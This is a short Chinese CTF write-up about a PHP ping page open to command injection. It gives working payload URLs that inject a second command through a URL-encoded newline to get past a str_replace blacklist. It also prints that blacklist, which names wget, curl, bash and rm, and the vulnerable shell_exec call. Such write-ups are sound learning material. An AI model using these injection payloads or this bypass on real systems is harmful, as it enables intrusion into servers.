ctf里某群友发的题:http://45.124.115.155:8003/a74a15c5fb626077/**
ls、cat 之类的命令都被过滤了。不过可以用 %0A 换行注入一条 `more ping.php`，把 ping.php 自己的源码（包括黑名单）读出来(http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php):
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.086/0.086/0.086/0.000 ms :::::::::::::: ping.php :::::::::::::: 'sbsbbsb', ';' => 'sb', '|' => 'sb', '-' => 'sb', '$' => 'sb', '(' => 'sb', ')' => 'sb', '`' => 'sb', '||' => 'sb', '<>' => 'sb', 'bash' => 'sb', '>' => 'sb', 'wget' => 'sb', 'cat' => '', 'cd' => 'sb', '../' => 'sb', '/' => 'sb', 'rm' => 'sb', '>>' => 'sb', 'echo' => 'sb', 'curl' => 'sb', 'dd' => 'sb', ); // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // var_dump($target); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping ' . $target ); } else { // *nix $cmd = shell_exec( 'ping -c 1 ' . $target ); } // Feedback for the end user echo "{$cmd}";
%0a 是 URL 编码的换行符（LF）。从读出的源码看，黑名单用 str_replace 替换了 `;`、`|`、`||`、反引号、`$`、`(`、`)` 等分隔符和常见命令，但没有处理换行；参数直接拼进 `shell_exec( 'ping -c 1 ' . $target )`，所以换行之后的内容会被 shell 当作第二条命令执行。
more 不在黑名单里，可以代替被删掉的 cat 读取文件。注意 `/` 和 `../` 也会被替换掉，所以只能用相对 ping.php 所在目录的文件名，不能写绝对路径或跳目录（当初学点运维还是挺有用的）
payload:http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20flag_is_here.php